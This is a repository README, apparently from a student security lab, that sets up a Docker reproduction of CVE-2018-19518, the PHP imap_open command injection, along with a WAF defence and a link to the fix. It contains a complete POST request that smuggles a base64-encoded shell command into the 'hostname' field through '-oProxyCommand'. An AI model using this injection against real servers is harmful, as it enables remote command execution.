CVE-2018-19518

last rapport here : https://gitlab.com/ensimag-security/CVE-2018-19518/-/jobs/artifacts/master/raw/rapport.pdf?job=PDF

Usage

run app

docker-compose up -d

example normal usage for the web app.

imap : webmail.grenoble-inp.org
user : prenom.nom@grenoble-inp.org
password : xxx

exploit

using echo '1234567890'>/tmp/test0001.

POST / HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 125

hostname=x+-oProxyCommand%3decho%09ZWNobyAnMTIzNDU2Nzg5MCc%2bL3RtcC90ZXN0MDAwMQo%3d|base64%09-d|sh}&username=111&password=222

check

docker-compose exec app bash and read the file cat /tmp/test0001：

waf

https://github.com/theonemule/docker-waf

Relevant commit

https://git.php.net/?p=php-src.git;a=commit;h=e5bfea64c81ae34816479bb05d17cdffe45adddb

Name		Name	Last commit message	Last commit date
Latest commit History 34 Commits
app		app
docs		docs
msf		msf
waf		waf
.gitignore		.gitignore
.gitlab-ci.yml		.gitlab-ci.yml
README.md		README.md
docker-compose-msf.yml		docker-compose-msf.yml
docker-compose-waf.yml		docker-compose-waf.yml
docker-compose.yml		docker-compose.yml
rapport.md		rapport.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2018-19518

Usage

run app

exploit

check

waf

Relevant commit

References

About

Releases

Packages

Languages

ensimag-security/CVE-2018-19518

Folders and files

Latest commit

History

Repository files navigation

CVE-2018-19518

Usage

run app

exploit

check

waf

Relevant commit

References

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages